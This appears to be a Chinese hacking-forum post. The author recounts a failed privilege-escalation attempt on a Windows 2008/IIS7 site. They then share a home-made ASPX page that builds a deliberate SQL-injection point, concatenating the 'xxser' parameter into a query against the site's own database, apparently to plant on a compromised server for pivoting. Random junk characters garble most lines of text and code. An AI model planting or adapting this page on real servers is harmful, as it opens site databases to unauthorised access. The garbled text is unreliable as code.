昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
& K* N" }3 J- ]4 V% X2 F( s其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。 M3 T: E& J, I2 K+ r+ c; S$ [
代码量不多,自己写个拉倒了。烦死了。; @$ x& X2 P$ Q8 L; n5 l( J' F+ j
# ?4 H$ M# }5 x) x
. I, U# r5 R) z4 o2 W6 c<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> }4 V* o) R" z) d$ b
<html xmlns="http://www.w3.org/1999/xhtml">
7 Z0 \1 {9 x" ]% ^9 v. J8 ?( t<head runat="server">
! v+ I, G+ ?* U- S9 i <title>暗影aspx构造注射专用页面</title>
: e, h, z8 T' H; `) z</head>) a& V4 ^0 g' z% p7 U4 l6 v# A
<body>) l" ]' y- r: s+ N! b/ i7 o
<form id="form1" runat="server">' v' R! X ^' E. T0 m* Q! O
<div>
0 |- R( Z& F/ { <script language="c#" runat="server">2 M8 \8 ?# Z C
7 R, N" l" ?8 l0 y( @
void page_init(object sender, EventArgs e)
( a N/ e: @& B7 e$ T1 H {
2 J4 I X- M( J8 y+ r K. l! b
3 T; j% L0 l6 m, V a System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
5 `- X; f7 x% L& H8 }/ Q% s6 o 6 M& M' l1 J. f. ?) M
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();$ j0 m2 H! Y2 T# e: E
conn.Open();
& ~' F6 X7 I; r& r n+ z ! G m |& J+ Q4 }* Y6 [- W
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
; Y9 j t3 ~' r
. R4 d I; M4 W1 U System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);# f* v# r9 S4 l( k
int x = command.ExecuteNonQuery();9 p0 O: |; d2 {0 I3 L1 G! L( E6 Y
Response.Write(i+"\n");
7 q7 L& U) w" B5 n; Y- { Response.Write(x);. h4 Z5 Y( B' R
conn.Close();
, @7 J$ _+ [. o }5 S% k2 {' }* {* o' [5 F6 u
6 s! q" r7 I5 ]1 U: b4 x </script>
7 V( g: |; _# c+ S </div>& H' k3 F( p# T: j9 d1 j. ?
</form>
?$ v+ U7 m$ `+ _; J/ m4 f, ^5 w" @</body>
/ |" Z/ G1 [. A1 f</html>4 Z) I+ K! f2 N/ ?7 y
|